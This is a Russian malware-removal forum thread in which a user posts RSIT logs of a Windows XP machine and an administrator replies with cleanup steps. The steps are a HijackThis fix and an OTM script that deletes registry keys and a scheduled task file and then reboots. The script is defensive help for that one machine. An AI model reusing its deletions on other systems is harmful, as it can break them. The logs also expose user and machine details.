    2010-10-13 18:17:21 —-D—- C:Program FilesЗоркий глаз
    2010-10-04 16:52:45 —-D—- C:Documents and SettingsAndrewApplication DataTicno
    2010-10-04 16:52:45 —-D—- C:Documents and SettingsAndrewApplication DataBreakpad
    2010-10-04 16:46:39 —-D—- C:Program FilesMail.Ru
    2010-10-04 16:45:28 —-D—- C:Documents and SettingsAndrewApplication DataInstaller

    ======List of files/folders modified in the last 1 months======

    2024-03-21 13:44:18 —-A—- C:WINDOWSUNINST16.EXE
    2010-10-18 12:08:33 —-D—- C:Temp
    2010-10-18 12:08:30 —-D—- C:WINDOWSPrefetch
    2010-10-18 12:08:23 —-RD—- C:Program Files
    2010-10-18 12:02:35 —-D—- C:Program FilesMozilla Firefox
    2010-10-18 12:02:15 —-A—- C:WINDOWSAVerTV.ini
    2010-10-18 12:02:06 —-SD—- C:WINDOWSTasks
    2010-10-15 17:46:21 —-A—- C:WINDOWSSchedLgU.Txt
    2010-10-15 17:30:56 —-D—- C:Documents and SettingsAndrewApplication DataThe Bat!
    2010-10-15 16:27:01 —-D—- C:WINDOWS
    2010-10-14 17:41:01 —-D—- C:WINDOWSsystem32drivers
    2010-10-06 16:34:23 —-D—- C:Documents and SettingsAndrewApplication DataXnView
    2010-09-30 16:55:55 —-D—- C:WINDOWSsystem32CatRoot2
    2010-09-30 16:51:42 —-A—- C:WINDOWSwinamp.ini
    2010-09-30 16:50:46 —-SHD—- C:RECYCLER
    2010-09-27 21:24:22 —-SHD—- C:WINDOWSInstaller
    2010-09-27 21:24:13 —-D—- C:Program FilesOpera

    ======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

    R1 Aavmker4;avast! Asynchronous Virus Monitor; C:WINDOWSsystem32driversAavmker4.sys [2009-11-25 27408]
    R1 aswSP;avast! Self Protection; C:WINDOWSsystem32driversaswSP.sys [2009-11-25 114768]
    R1 aswTdi;avast! Network Shield Support; C:WINDOWSsystem32driversaswTdi.sys [2009-11-25 48560]
    R1 intelppm;Драйвер Intel процессора; C:WINDOWSsystem32DRIVERSintelppm.sys [2004-08-17 40448]
    R1 kbdhid;Драйвер клавиатуры HID; C:WINDOWSsystem32DRIVERSkbdhid.sys [2004-08-17 14848]
    R1 PQNTDrv;PQNTDrv; C:WINDOWSsystem32driversPQNTDrv.sys [2003-04-16 4228]
    R1 uzi3otqy;AVZ-RK Kernel Driver; ??C:WINDOWSsystem32Driversuzi3otqy.sys []
    R2 aswFsBlk;aswFsBlk; C:WINDOWSsystem32DRIVERSaswFsBlk.sys [2009-11-25 20560]
    R2 aswMon2;avast! Standard Shield Support; C:WINDOWSsystem32driversaswMon2.sys [2009-11-25 94160]
    R2 regi;regi; ??C:WINDOWSsystem32driversregi.sys []
    R2 rspndr;Ответчик обнаружения топологии уровня связи; C:WINDOWSsystem32DRIVERSrspndr.sys [2006-12-04 62336]
    R3 aswRdr;aswRdr; C:WINDOWSsystem32driversaswRdr.sys [2009-11-25 23120]
    R3 Cap7134;Cap7134 Capture; C:WINDOWSsystem32DRIVERSCap7134.sys [2010-04-12 345056]
    R3 ctljystk;Игровой порт Creative SB Live!; C:WINDOWSsystem32DRIVERSctljystk.sys [2001-08-18 3712]
    R3 EL90XBC;3Com EtherLink XL 90XB/C, драйвер адаптера; C:WINDOWSsystem32DRIVERSel90xbc5.sys [2001-08-18 66591]
    R3 emu10k;Creative SB Live! (WDM); C:WINDOWSsystem32driversemu10k1m.sys [2001-08-18 283904]
    R3 emu10k1;Драйвер Creative Interface Manager (WDM); C:WINDOWSsystem32driversctlfacem.sys [2001-08-18 6912]
    R3 hidusb;Драйвер класса HID Microsoft; C:WINDOWSsystem32DRIVERShidusb.sys [2001-10-20 9600]
    R3 mouhid;Драйвер мыши HID; C:WINDOWSsystem32DRIVERSmouhid.sys [2001-10-19 12160]
    R3 nv;nv; C:WINDOWSsystem32DRIVERSnv4_mini.sys [2004-03-03 1893536]
    R3 PhTVTune;Cap7134 TVTuner; C:WINDOWSsystem32DRIVERSPhTVTune.sys [2010-04-12 35008]
    R3 sfman;Драйвер Creative SoundFont Manager (WDM); C:WINDOWSsystem32driverssfmanm.sys [2001-08-18 36480]
    R3 usbehci;Драйвер минипорта Microsoft USB 2.0 расширенного хост-контроллера; C:WINDOWSsystem32DRIVERSusbehci.sys [2007-02-18 30208]
    R3 usbhub;USB2 концентратор; C:WINDOWSsystem32DRIVERSusbhub.sys [2007-02-18 59264]
    R3 usbuhci;Драйвер минипорта Microsoft USB универсального хост-контроллера; C:WINDOWSsystem32DRIVERSusbuhci.sys [2007-02-18 20608]
    S3 CCDECODE;Closed Caption декодер; C:WINDOWSsystem32DRIVERSCCDECODE.sys [2004-08-04 17024]
    S3 gHidPnp;USB Device Enhanced Function Driver; C:WINDOWSSystem32DriversgHidPnp.Sys []
    S3 gMouPS2;PS2 Scroll Mouse Device; C:WINDOWSsystem32DRIVERSgMouPS2.sys []
    S3 gMouUsb;USB Mouse Device Drv; C:WINDOWSsystem32DRIVERSgMouUsb.sys []
    S3 GMSIPCI;GMSIPCI; ??D:INSTALLGMSIPCI.SYS []
    S3 MSTEE;Преобразователь потоков Tee/Sink-to-Sink Microsoft; C:WINDOWSsystem32driversMSTEE.sys [2004-08-03 5504]
    S3 NABTSFEC;NABTS/FEC VBI кодек; C:WINDOWSsystem32DRIVERSNABTSFEC.sys [2004-08-04 85376]
    S3 NdisIP;Microsoft видео или ТВ подключение; C:WINDOWSsystem32DRIVERSNdisIP.sys [2004-08-04 10880]
    S3 SLIP;BDA Slip De-Framer; C:WINDOWSsystem32DRIVERSSLIP.sys [2004-08-04 11136]
    S3 streamip;BDA IPSink; C:WINDOWSsystem32DRIVERSStreamIP.sys [2004-08-04 15360]
    S3 USBSTOR;Драйвер запоминающих устройств для USB; C:WINDOWSsystem32DRIVERSUSBSTOR.SYS [2004-08-04 26496]
    S3 WSTCODEC;World Standard Teletext кодек; C:WINDOWSsystem32DRIVERSWSTCODEC.SYS [2004-08-04 19328]

    ======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

    R2 aswUpdSv;avast! iAVS4 Control Service; C:Disk Program FilesAlwil SoftwareAvast4aswUpdSv.exe [2009-11-25 18752]
    R2 avast! Antivirus;avast! Antivirus; C:Disk Program FilesAlwil SoftwareAvast4ashServ.exe [2009-11-25 138680]
    R2 NVSvc;NVIDIA Display Driver Service; C:WINDOWSsystem32nvsvc32.exe [2004-03-03 77824]
    S3 Adobe LM Service;Adobe LM Service; C:Program FilesCommon FilesAdobe Systems SharedServiceAdobelmsvc.exe [2009-03-17 72704]
    S3 avast! Mail Scanner;avast! Mail Scanner; C:Disk Program FilesAlwil SoftwareAvast4ashMaiSv.exe [2009-11-25 254040]
    S3 avast! Web Scanner;avast! Web Scanner; C:Disk Program FilesAlwil SoftwareAvast4ashWebSv.exe [2009-11-25 352920]
    S3 ose;Office Source Engine; C:Program FilesCommon FilesMicrosoft SharedSource EngineOSE.EXE [2003-07-28 89136]

    EOF

    18 октября, 2010 в 8:13 дп #31666
    anri_hod
    Participant
    • Темы:1
    • Сообщений:3
    • ☆

    RSIT info.txt

    info.txt logfile of random’s system information tool 1.06 2010-10-18 12:08:35

    ======Uninstall list======

    —>rundll32.exe setupapi.dll,InstallHinfSection DefaultUninstall 132 C:WINDOWSINFPCHealth.inf
    ACDSee 9 Photo Manager—>MsiExec.exe /X{B2D41883-3BFC-4BA0-A2F6-5A2C9836C238}
    Adobe Bridge 1.0—>MsiExec.exe /I{B74D4E10-1033-0000-0000-000000000001}
    Adobe Common File Installer—>MsiExec.exe /I{8EDBA74D-0686-4C99-BFDD-F894678E5B39}
    Adobe Flash Player 10 ActiveX—>C:WINDOWSsystem32MacromedFlashuninstall_activeX.exe
    Adobe Flash Player 10 Plugin—>C:WINDOWSsystem32MacromedFlashFlashUtil10i_Plugin.exe -maintain plugin
    Adobe Help Center 1.0—>MsiExec.exe /I{E9787678-1033-0000-8E67-000000000001}
    Adobe Illustrator CS2—>msiexec /I {B2F5D08C-7E79-4FCD-AAF4-57AD35FF0601}
    Adobe Photoshop CS2—>msiexec /I {236BB7C4-4419-42FD-0409-1E257A25E34D}
    Adobe Reader 9.3.3 — Russian—>MsiExec.exe /I{AC76BA86-7AD7-1049-7B44-A93000000001}
    Adobe Stock Photos 1.0—>MsiExec.exe /I{786C5747-1033-0000-B58E-000000000001}
    Adobe SVG Viewer 3.0—>C:Program FilesCommon FilesAdobeSVG Viewer 3.0UninstallWinstall.exe -u -fC:Program FilesCommon FilesAdobeSVG Viewer 3.0UninstallInstall.log
    Agfa FotoLook 2.09.04—>C:WINDOWSuninst.exe -fC:WINDOWSTWAIN_32LOOK2_09.04DeIsL1.isu
    avast! Antivirus—>C:Disk Program FilesAlwil SoftwareAvast4aswRunDll.exe «C:Disk Program FilesAlwil SoftwareAvast4Setupsetiface.dll»,RunSetup
    AVerTV—>C:PROGRA~1COMMON~1INSTAL~1Driver7INTEL3~1IDriver.exe /M{8DF56C91-281F-4C15-B954-F45FDC919568} /l1049
    AVS Disc Creator version 2.1—>»C:Program FilesAVSMediaDiscCreatorunins000.exe»
    Convexsoft Animated GIF Converter—>»C:WINDOWSConvexsoft Animated GIF Converter Uninstaller.exe»
    CorelDRAW Graphics Suite X3—>MsiExec.exe /I{7C5123A9-30A8-4C44-89CA-A8C87A1FCC91}
    doPDF 5.3 printer—>»C:Program FilesSoftlanddoPDF 5unins000.exe»
    Exif Pilot Pro Demo—>»C:Program FilesExif Pilot Pro Demounins000.exe»
    Flash Optimizer—>»C:Program FilesEltima SoftwareFlash Optimizerunins000.exe»
    FontNav—>MsiExec.exe /I{4E98F23B-1328-4322-A6EC-2EDC8FC3A4FE}
    HijackThis 2.0.2—>»C:Program Filestrend microHijackThis.exe» /uninstall
    InterVideo FilterSDK—>RunDll32 C:PROGRA~1COMMON~1INSTAL~1engine6INTEL3~1ctor.dll,LaunchSetup «C:Program FilesInstallShield Installation Information{A15ED800-19FF-11D5-AF7F-0050BA1191E9}setup.exe» REMOVEALL
    IrfanView (remove only)—>C:Program FilesIrfanViewiv_uninstall.exe
    KoolMoves 6.2.0—>»C:Program FilesKoolMovesunins000.exe»
    Light Alloy 2.4—>C:WINDOWSmuninst.exe «Light Alloy 2.4»
    Magic Swf2Gif 1.35—>»C:Program FilesMagic Swf2Gifunins000.exe»
    Malwarebytes’ Anti-Malware—>»C:Program FilesMalwarebytes’ Anti-Malwareunins000.exe»
    Microsoft Internationalized Domain Names Mitigation APIs—>»C:WINDOWS$NtServicePackUninstallIDNMitigationAPIs$spuninstspuninst.exe»
    Microsoft National Language Support Downlevel APIs—>»C:WINDOWS$NtServicePackUninstallNLSDownlevelMapping$spuninstspuninst.exe»
    Microsoft Office — профессиональный выпуск версии 2003—>MsiExec.exe /I{90110419-6000-11D3-8CFE-0150048383C9}
    Microsoft Visual C++ 2005 Redistributable—>MsiExec.exe /X{A49F249F-0C91-497F-86DF-B2585E8E76B7}
    Mozilla Firefox (3.6.2pre)—>C:Program FilesMozilla Firefoxuninstallhelper.exe
    MPEG Video Wizard DVD 5.0.0.104 (01/2010)—>»C:Program FilesWomble MultimediaMPEG Video Wizard DVD 5.0unins000.exe»
    NVIDIA Display Driver—>C:WINDOWSsystem32nvudisp.exe Uninstall C:WINDOWSsystem32nvdisp.nvu,NVIDIA Display Driver
    Opera 10.62—>MsiExec.exe /X{18E65799-76BD-46EF-9E53-972FE5A40736}
    PowerQuest PartitionMagic 8.0—>C:PROGRA~1COMMON~1INSTAL~1Driver7INTEL3~1IDriver.exe /M{6BE2A4A4-99FB-48ED-AE1E-4E850389F804}
    QuickTime Alternative 2.8.0—>»C:Program FilesMagic Video Convertercodecquicktimeunins000.exe»
    Real Alternative 1.9.0—>»C:Program FilesMagic Video Convertercodecrealunins000.exe»
    RU—>MsiExec.exe /I{01AE68B4-C785-4865-BC7E-78456372BB75}
    SWF & FLV Player 3.0 (build 3.0.33.5106)—>»C:Program FilesEltima SoftwareSWF & FLV Playerunins000.exe»
    Ulead GIF Animator 5 ESD—>RunDll32 C:PROGRA~1COMMON~1INSTAL~1engine6INTEL3~1Ctor.dll,LaunchSetup «C:Program FilesInstallShield Installation Information{8AF3E926-ED59-11D4-A44B-0000E86D2305}Setup.exe»
    UltraISO Premium V8.2—>»C:Program FilesUltraISOunins000.exe»
    Update Manager—>MsiExec.exe /I{F428D0FB-765D-40EB-BDD8-A1E7F5C597FA}
    VBA—>MsiExec.exe /I{C94E45B0-6AA6-4FB9-9AAE-22085F631880}
    Winamp (remove only)—>»C:Program FilesWinampUninstWA.exe»
    Windows Internet Explorer 7—>»C:WINDOWSie7spuninstspuninst.exe»
    WinZip—>»C:Program FilesWinZipWINZIP32.EXE» /uninstall
    Xilisoft Video Converter Ultimate—>C:Program FilesXilisoftVideo Converter UltimateUninstall.exe
    XnView 1.96.5—>»C:Program FilesXnViewunins000.exe»
    XP Codec Pack—>C:Program FilesXP Codec PackUninstall.exe
    Yahoo! Install Manager—>C:WINDOWSsystem32regsvr32 /u C:PROGRA~1Yahoo!CommonYINSTH~1.DLL
    Yahoo! Toolbar—>C:PROGRA~1Yahoo!Commonunyt.exe
    Зоркий глаз, версия 5.404—>»C:Program FilesЗоркий глазunins000.exe»
    Пакет обеспечения совместимости для выпуска 2007 системы Microsoft Office—>MsiExec.exe /X{90120000-0020-0419-0000-0000000FF1CE}
    Яндекс.Бар для Internet Explorer 4.1.0—>»C:Program FilesYandexYandexBarIEunins000.exe»

    ======Security center information======

    AV: avast! antivirus 4.8.1368 [VPS 101017-1] (disabled)

    ======System event log======

    Computer Name: ANRISTATION
    Event Code: 7036
    Message: Служба «Телефония» перешла в состояние Работает.

    Record Number: 10995
    Source Name: Service Control Manager
    Time Written: 20100527114938.000000+240
    Event Type: информация
    User:

    Computer Name: ANRISTATION
    Event Code: 7036
    Message: Служба «Служба обнаружения SSDP» перешла в состояние Работает.

    Record Number: 10994
    Source Name: Service Control Manager
    Time Written: 20100527114938.000000+240
    Event Type: информация
    User:

    Computer Name: ANRISTATION
    Event Code: 7035
    Message: Служба «Служба обнаружения SSDP» успешно отправила управляющий элемент «запустить».

    Record Number: 10993
    Source Name: Service Control Manager
    Time Written: 20100527114938.000000+240
    Event Type: информация
    User: NT AUTHORITYSYSTEM

    Computer Name: ANRISTATION
    Event Code: 7036
    Message: Служба «Служба COM записи компакт-дисков IMAPI» перешла в состояние Работает.

    Record Number: 10992
    Source Name: Service Control Manager
    Time Written: 20100527114938.000000+240
    Event Type: информация
    User:

    Computer Name: ANRISTATION
    Event Code: 7035
    Message: Служба «Служба COM записи компакт-дисков IMAPI» успешно отправила управляющий элемент «запустить».

    Record Number: 10991
    Source Name: Service Control Manager
    Time Written: 20100527114938.000000+240
    Event Type: информация
    User: NT AUTHORITYSYSTEM

    ======Environment variables======

    «ComSpec»=%SystemRoot%system32cmd.exe
    «Path»=%SystemRoot%system32;%SystemRoot%;%SystemRoot%System32Wbem;C:Program FilesCommon FilesAdobeAGL
    «windir»=%SystemRoot%
    «FP_NO_HOST_CHECK»=NO
    «OS»=Windows_NT
    «PROCESSOR_ARCHITECTURE»=x86
    «PROCESSOR_LEVEL»=15
    «PROCESSOR_IDENTIFIER»=x86 Family 15 Model 2 Stepping 4, GenuineIntel
    «PROCESSOR_REVISION»=0204
    «NUMBER_OF_PROCESSORS»=1
    «PATHEXT»=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
    «TEMP»=%SystemDrive%Temp
    «TMP»=%SystemDrive%Temp

    EOF

    31 октября, 2010 в 7:13 пп #31667
    Admin
    Keymaster
    • Темы:40
    • Сообщений:5676
    • ☆☆☆☆☆

    Запустите HijackThis, для этого кликните Пуск, Выполнить, введите 

    C:Program Filestrend microAndrew.exe

    и нажмите Enter.
    Откроется главное меню программы HijackThis.
    Кликните по кнопке Do a system scan only.
    Далее отметьте галочкой (слева) следующие строки, если они присутствуют:

    F3 - REG:win.ini: load=C:WINDOWStasksSA.bat

    Закройте все запущенные программы (включая InternetExplorer) и окна Windows.
    Кликните по кнопке Fix checked и подтвердите свои действия выбрав YES.
    Закройте HijackThis.

    Скачайте OTM by OldTimer кликнув по этой ссылке.
    Запустите OTM и в большое поле ввода (заголовок этого поля выделен желтым цветом) скопируйте следующий текст.

    :reg
    
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce]
    
"Sputnik"=-
    

    
[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerBrowser Helper Objects{8984B388-A5BB-4DF7-B274-77B879E179DB}]
    
[-HKEY_CURRENT_USERsoftwaremicrosoftwindowscurrentversionexplorermountpoints2{40c643e0-4e8f-11de-b86c-0001032e5853}]
    
[-HKEY_CURRENT_USERsoftwaremicrosoftwindowscurrentversionexplorermountpoints2{5fae8a8b-6188-11df-973f-0001032e5853}]
    
[-HKEY_CURRENT_USERsoftwaremicrosoftwindowscurrentversionexplorermountpoints2{92a54fa7-1798-11de-b825-0001032e5853}]
    
[-HKEY_CURRENT_USERsoftwaremicrosoftwindowscurrentversionexplorermountpoints2{997422fd-d2ba-11de-b8d8-0001032e5853}]
    

    
:files
    
C:WINDOWStasksautocheck.job
    

    
:Commands
    
[emptytemp]
    
[Reboot]

    Проверьте вставленный скрипт, если слева перед директивами появились пробелы, то удалите их, скрипт должен выглядеть так же как в сообщении. Кликните по кнопке MoveIt!. В процессе работы возможна перезагрузка компьютера.
    По-завершении работы программы должен будет показан лог. Если лог не будет показан, то его можно найти в папке C:_OTMMovedFiles.

    Вставьте в ваше ответное сообщение содержимое этого лога. И приложите свежий RSIT лог.

  • Автор
    Сообщения
Просмотр 5 сообщений - с 1 по 5 (из 5 всего)
  • Для ответа в этой теме необходимо авторизоваться.
Войти

Добро пожаловать

На нашем сайте размещены инструкции и программы, которые помогут вам абсолютно бесплатно и самостоятельно удалить навязчивую рекламу, вирусы и трояны.

Поиск

Последние темы

  • Странность в Malwebytes опубликовано Artem225
    5 years назад
  • SUSPICIOUS.FakedMBR.1 что делать, помогите!!! опубликовано White
    5 years, 1 month назад
  • Помогите пожалуйста вирус замучил. опубликовано dimazons1233211
    5 years, 3 months назад
  • Замучила реклама опубликовано Данила Беспятов
    5 years, 4 months назад
  • Замучила реклама опубликовано Марк
    5 years, 1 month назад
  • Вирус S1.video.ru.net опубликовано ludovik
    5 years, 6 months назад
  • Чертов Safe Finder!!!! опубликовано kosta savo
    5 years, 3 months назад
  • ESET блокирует неизвестный сайт , вход на который не осуществлялся. опубликовано trollhamaren
    5 years, 7 months назад

СПАЙВАРЕ РУ

  • О Спайваре Ру
  • Контакты
  • Реклама на сайте
  • Политика конфиденциальности
  • Правила использования

Нужна помощь?

Задайте свой вопрос прямо сейчас кликнув по следующей ссылке Задать вопрос.

Или обратитесь на наш форум, где команда Spyware-ru поможет вам. Узнайте, как попросить о помощи здесь.

Ссылки

  • Инструкции
  • Скачать программы
  • Помощь в удалении вирусов
  • Как вылечить компьютер
Copyright © 2008 - 2024 Spyware-RU.com (en)